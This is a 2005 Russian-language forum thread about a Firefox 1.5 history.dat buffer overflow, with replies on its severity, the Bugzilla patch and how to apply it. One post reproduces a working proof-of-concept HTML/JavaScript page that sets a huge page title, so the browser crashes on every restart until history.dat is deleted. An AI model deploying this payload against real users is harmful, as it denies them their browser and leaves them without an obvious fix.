Полезная информация
№108-12-2005 00:22:52
Эксплоит уязвимости Firefox 1.5
Опубликован исходный код (в виде javascript-кода), который использует уязвимость браузера Firefox 1.5. Принцип действия его довольно прост. Как пишет автор, Firefox использует для сохранения всех посещённых URL файл history.dat. Созданный скрипт сохраняет в этом файле очень большой топпик. В результате при следующей загрузке браузера происходит его постоянное зависание из-за переполнения буфера. Для устранения последствий рекомендуется ручное удаления файла history.dat.
Источник:
uinС: Новости компьютерной безопасности
http://www.uinc.ru/news/sn4944.html
Нигде не нашел инфы про это. Иправили или как?
Отсутствует
№308-12-2005 13:23:00
Re: Эксплоит уязвимости Firefox 1.5
Код:
<!-- Firefox 1.5 buffer overflow
Basically firefox logs all kinda of URL data in it's history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into it's history.dat.. The next time that firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen everytime until you manually delete the history.dat file -- which
most users won't figure out.
this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifcations.
Tested with Firefox 1.5 on Windows XP SP2.
ZIPLOCK <sickbeatz@gmail.com>
-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>Уязвимость не такая страшная, думаю быстро заткнут.
Бди!
Отсутствует
№408-12-2005 18:55:39
Re: Эксплоит уязвимости Firefox 1.5
Уязвимость не такая страшная
1) Что подумают домохозяйки на краши браузера при запуске? Кто им скажет, что нужно удалять какой-то файл? Ведь по легенде создавали его именно для них.
2) На фоне обновлений патчами и быстроты латания дыр "страха" меньше, согласен; но сама дыра... Она даже не страшная, она какая-то дурацкая. Хотя... со всеми бывает.
Отсутствует
№508-12-2005 19:11:10
Re: Эксплоит уязвимости Firefox 1.5
С этим history.dat и раньше проблемы были.. Наверное, его формат не менялся со времён нетшкафа, так и работает годы без капремонта. 
Без бага и ошибки я софт Mozilla не люблю!
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Microsoft® Office Outlook® 2007 (12.0.4518.1014) MSO (12.0.4518.1014)
Отсутствует
№608-12-2005 20:17:13
Re: Эксплоит уязвимости Firefox 1.5
> Уязвимость не такая страшная
Ну, я бы сказал бы по поводу страшных уязвимостей. Просто все равно очень не приятно. Буду очень признателен, если за каким номером в багзилле эта уязвимость идет.
Отсутствует
№709-12-2005 01:08:45
Re: Эксплоит уязвимости Firefox 1.5
Do not meddle in the affairs of Wizards, for they are subtle and quick to anger.
Отсутствует
№1809-12-2005 19:24:09
Re: Эксплоит уязвимости Firefox 1.5
cr@nk пишетУ меня Firefox 1.5 RU.
Дайте пожалуйста ссылку на патч.Тут многие автообновление ждут с 1.5 RC2
а вы слезте с канала бета тестирования на release
Так я не про себя 
А про общественность. Я нетерпеливый - скачал полностью 
Отсутствует
№1909-12-2005 21:30:45
Re: Эксплоит уязвимости Firefox 1.5
По поводу уязвимости: несколько личностей (причём здесь под словом личность я подразумеваю исключительно негативную оценку социальных качеств) заранее, задолго до того, как уязвимось приобрела широкую известность, знали о ней. Напомню, что уязвимость касается обработки скрипта и внесения кода в history.dat. Уверен на 100%.
Они дождались-таки выхода финальной версии Firefox 1.5 - и только тогда, когда уже практически все пользователи одновились - опубликовали сведения.
Речь веду не об организациях, которые разместили сведения - наверняка источники другие (хотя нельзя ничего исключать) - речь о том, что исключительно подлые и злонамеренные люди сделали такую нехорошую вещь.
сорок два
Отсутствует
№2009-12-2005 21:33:10
Re: Эксплоит уязвимости Firefox 1.5
KDA #$%#@#!!! (эт я не про тебя 
)
Отредактировано Viper (09-12-2005 21:33:32)
---/)/)---(\.../)---(\(\
--(':'=)---(=';'=)---(=':')
(")(")..)-(").--.(")-(..(")(")
Отсутствует
№2109-12-2005 22:52:20
Re: Эксплоит уязвимости Firefox 1.5
Спасибо за ссылочку Как думаете, скоро выйдет обновление (чувствую не долго мне осталось на 1.0.x сидеть (хотя в мандриве должны наверное будут патчик добавить...)
Отсутствует
№2209-12-2005 22:54:46
Re: Эксплоит уязвимости Firefox 1.5
и что делать с этим патчем? как его применить? подскажите плиз
Отсутствует
№2309-12-2005 23:02:29
Re: Эксплоит уязвимости Firefox 1.5
jedy Качаешь исходники, правишь их в соответствии с этим https://bugzilla.mozilla.org/attachment.cgi?id=205381&action=diff , компилируешь .
Не стоит оно труда. ибо
но сама дыра... Она даже не страшная, она какая-то дурацкая.
---/)/)---(\.../)---(\(\
--(':'=)---(=';'=)---(=':')
(")(")..)-(").--.(")-(..(")(")
Отсутствует
№2509-12-2005 23:36:18
Re: Эксплоит уязвимости Firefox 1.5
jedy Качаешь исходники, правишь их в соответствии с этим https://bugzilla.mozilla.org/attachment.cgi?id=205381&action=diff , компилируешь
Не стоит оно труда. ибоно сама дыра... Она даже не страшная, она какая-то дурацкая.
извени,не понял-(,
как мне их скомпилить и как исправить?
Отсутствует
Board footer
Powered by PunBB
Modified by Mozilla Russia
Copyright © 2004–2020 Mozilla Russia 
Язык отображения форума: [Русский] [English]